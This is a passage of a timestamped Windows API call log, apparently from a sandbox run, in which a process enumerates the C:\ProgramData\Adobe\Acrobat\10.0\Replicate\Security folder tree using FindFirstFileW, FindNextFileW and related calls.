ftLastAccessTime.dwLowDateTime=0xe4efbbe0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe4efbbe0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ARM", cAlternateFileName="")) returned 1 [0132.204] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f1b4 | out: lpFindFileData=0x691f1b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe4efbbe0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe4efbbe0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ARM", cAlternateFileName="")) returned 0 [0132.204] FindClose (in: hFindFile=0xb7ef50 | out: hFindFile=0xb7ef50) returned 1 [0132.204] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f43c) returned 1 [0132.204] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f448) returned 1 [0132.204] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f47c) returned 1 [0132.204] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Adobe", nBufferLength=0x105, lpBuffer=0x691ef84, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Adobe", lpFilePart=0x0) returned 0x14 [0132.204] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Adobe\\", nBufferLength=0x105, lpBuffer=0x691ef58, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Adobe\\", lpFilePart=0x0) returned 0x15 [0132.204] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Adobe\\*", lpFindFileData=0x691f1a4 | out: lpFindFileData=0x691f1a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe4efbbe0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe4efbbe0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7ef50 [0132.204] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f1b4 | out: lpFindFileData=0x691f1b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe4efbbe0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe4efbbe0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0132.204] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f1b4 | out: lpFindFileData=0x691f1b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Acrobat", cAlternateFileName="")) returned 1 [0132.204] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f1b4 | out: lpFindFileData=0x691f1b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe4efbbe0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe4efbbe0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ARM", cAlternateFileName="")) returned 1 [0132.205] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f1b4 | out: lpFindFileData=0x691f1b4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0132.205] FindClose (in: hFindFile=0xb7ef50 | out: hFindFile=0xb7ef50) returned 1 [0132.205] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f43c) returned 1 [0132.205] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f448) returned 1 [0132.205] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f42c) returned 1 [0132.205] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Adobe\\Acrobat", nBufferLength=0x105, lpBuffer=0x691ef34, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Adobe\\Acrobat", lpFilePart=0x0) returned 0x1c [0132.205] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Adobe\\Acrobat\\", nBufferLength=0x105, lpBuffer=0x691ef08, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Adobe\\Acrobat\\", lpFilePart=0x0) returned 0x1d [0132.205] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Adobe\\Acrobat\\*", lpFindFileData=0x691f154 | out: lpFindFileData=0x691f154*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7ef50 [0132.205] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0132.206] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="10.0", cAlternateFileName="")) returned 1 [0132.206] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="10.0", cAlternateFileName="")) returned 0 [0132.206] FindClose (in: hFindFile=0xb7ef50 | out: hFindFile=0xb7ef50) returned 1 [0132.206] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3ec) returned 1 [0132.206] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3f8) returned 1 [0132.206] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f42c) returned 1 [0132.206] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Adobe\\Acrobat", nBufferLength=0x105, lpBuffer=0x691ef34, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Adobe\\Acrobat", lpFilePart=0x0) returned 0x1c [0132.206] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Adobe\\Acrobat\\", nBufferLength=0x105, lpBuffer=0x691ef08, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Adobe\\Acrobat\\", lpFilePart=0x0) returned 0x1d [0132.206] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Adobe\\Acrobat\\*", lpFindFileData=0x691f154 | out: lpFindFileData=0x691f154*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7ef50 [0132.206] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0132.207] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="10.0", cAlternateFileName="")) returned 1 [0132.207] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0132.207] FindClose (in: hFindFile=0xb7ef50 | out: hFindFile=0xb7ef50) returned 1 [0132.207] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3ec) returned 1 [0132.207] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3f8) returned 1 [0132.207] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f3dc) returned 1 [0132.207] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Adobe\\Acrobat\\10.0", nBufferLength=0x105, lpBuffer=0x691eee4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Adobe\\Acrobat\\10.0", lpFilePart=0x0) returned 0x21 [0132.207] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Adobe\\Acrobat\\10.0\\", nBufferLength=0x105, lpBuffer=0x691eeb8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Adobe\\Acrobat\\10.0\\", lpFilePart=0x0) returned 0x22 [0132.207] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Adobe\\Acrobat\\10.0\\*", lpFindFileData=0x691f104 | out: lpFindFileData=0x691f104*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7ef50 [0132.207] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0132.208] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Replicate", cAlternateFileName="REPLIC~1")) returned 1 [0132.208] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Replicate", cAlternateFileName="REPLIC~1")) returned 0 [0132.208] FindClose (in: hFindFile=0xb7ef50 | out: hFindFile=0xb7ef50) returned 1 [0132.208] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f39c) returned 1 [0132.208] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3a8) returned 1 [0132.208] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f3dc) returned 1 [0132.208] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Adobe\\Acrobat\\10.0", nBufferLength=0x105, lpBuffer=0x691eee4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Adobe\\Acrobat\\10.0", lpFilePart=0x0) returned 0x21 [0132.208] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Adobe\\Acrobat\\10.0\\", nBufferLength=0x105, lpBuffer=0x691eeb8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Adobe\\Acrobat\\10.0\\", lpFilePart=0x0) returned 0x22 [0132.208] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Adobe\\Acrobat\\10.0\\*", lpFindFileData=0x691f104 | out: lpFindFileData=0x691f104*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7ef50 [0132.209] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0132.209] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Replicate", cAlternateFileName="REPLIC~1")) returned 1 [0132.209] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0132.209] FindClose (in: hFindFile=0xb7ef50 | out: hFindFile=0xb7ef50) returned 1 [0132.209] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f39c) returned 1 [0132.209] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3a8) returned 1 [0132.209] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f38c) returned 1 [0132.209] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate", nBufferLength=0x105, lpBuffer=0x691ee94, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate", lpFilePart=0x0) returned 0x2b [0132.209] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\", nBufferLength=0x105, lpBuffer=0x691ee68, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\", lpFilePart=0x0) returned 0x2c [0132.209] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\*", lpFindFileData=0x691f0b4 | out: lpFindFileData=0x691f0b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7ef50 [0132.210] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0132.210] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Security", cAlternateFileName="")) returned 1 [0132.210] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Security", cAlternateFileName="")) returned 0 [0132.210] FindClose (in: hFindFile=0xb7ef50 | out: hFindFile=0xb7ef50) returned 1 [0132.210] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f34c) returned 1 [0132.210] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f358) returned 1 [0132.210] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f38c) returned 1 [0132.211] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate", nBufferLength=0x105, lpBuffer=0x691ee94, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate", lpFilePart=0x0) returned 0x2b [0132.211] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\", nBufferLength=0x105, lpBuffer=0x691ee68, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\", lpFilePart=0x0) returned 0x2c [0132.211] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\*", lpFindFileData=0x691f0b4 | out: lpFindFileData=0x691f0b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7ef50 [0132.211] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0132.211] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Security", cAlternateFileName="")) returned 1 [0132.211] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0132.211] FindClose (in: hFindFile=0xb7ef50 | out: hFindFile=0xb7ef50) returned 1 [0132.211] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f34c) returned 1 [0132.211] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f358) returned 1 [0132.211] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f33c) returned 1 [0132.211] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security", nBufferLength=0x105, lpBuffer=0x691ee44, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security", lpFilePart=0x0) returned 0x34 [0132.211] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\", nBufferLength=0x105, lpBuffer=0x691ee18, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\", lpFilePart=0x0) returned 0x35 [0132.212] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\*", lpFindFileData=0x691f064 | out: lpFindFileData=0x691f064*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7ef50 [0132.212] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f074 | out: lpFindFileData=0x691f074*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0132.212] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f074 | out: lpFindFileData=0x691f074*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1df, dwReserved0=0x0, dwReserved1=0x0, cFileName="directories.acrodata", cAlternateFileName="DIRECT~1.ACR")) returned 1 [0132.212] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f074 | out: lpFindFileData=0x691f074*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0132.212] FindClose (in: hFindFile=0xb7ef50 | out: hFindFile=0xb7ef50) returned 1 [0132.212] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f2fc) returned 1 [0132.212] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f308) returned 1 [0132.212] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f33c) returned 1 [0132.212] GetFullPathNameW (in: 